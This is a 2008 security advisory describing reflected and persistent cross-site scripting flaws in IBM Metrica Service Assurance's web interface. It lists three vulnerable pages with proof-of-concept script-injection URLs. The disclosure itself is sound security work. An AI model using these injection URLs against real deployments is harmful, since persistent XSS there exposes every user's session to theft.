metrica-xss.txt

2008-11-09T00:00:00
ID PACKETSTORM:71738
Type packetstorm
Reporter Francesco Bianchino
Modified 2008-11-09T00:00:00

Description

                                        
                                            `Metrica Service Assurance Multiple Cross Site Scripting  
  
***********************************************************************  
  
Author: Francesco Bianchino  
  
Email: f.bianchino@gmail.com  
  
Title: Metrica Service Assurance Multiple Cross Site Scripting  
  
Vendor: IBM  
  
***********************************************************************  
  
Summary  
  
Metrica Service Assurance Framework implements a distributed,  
object-oriented, J2EE-based architecture. It work with a Web-based  
user interfaces, from end-user report generation to detailed system  
administration and configuration.  
  
***********************************************************************  
  
Vulnerability Detail  
  
The web-based interface of Metrica Service Assurance is exposed to  
multiple XSS attack. With an authenticated user it's possible to steal  
other user's sessions due to a flaw in the input validation  
mechanisms.  
A persistant XSS permits the insertion of malicious code into the  
web-based interface. Using the report generation function it is  
possible to create a report with malicious code in the name.  
That code is than rendered on the victim's browser when opening the  
report history which can be found in the main panel of the  
application.  
The code also persists into the main panel and all the users are  
exposed to the attack.  
  
There are at least three vulnerable pages:  
  
Non persistant:  
* http://server/<document root>/ReportTree  
* http://server/<document root>/Launch  
  
Persistant:  
* http://server/<document root>/ReportRequest  
  
***********************************************************************  
  
Exploit  
  
http://server/<document  
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non  
persistant XSS");</SCRIPT><!--&date=0000000000000  
  
http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non  
Persistant XSS");</SCRIPT>  
  
http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant  
XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main  
  
***********************************************************************  
  
Solution  
  
At the moment of writing this advisory the is no solution yet.  
  
***********************************************************************  
  
Credits  
  
Discovered and advised to IBM, November 2008 by Francesco Bianchino.  
Thanks to Marco borza and to da EthicalHAkinTeam  
`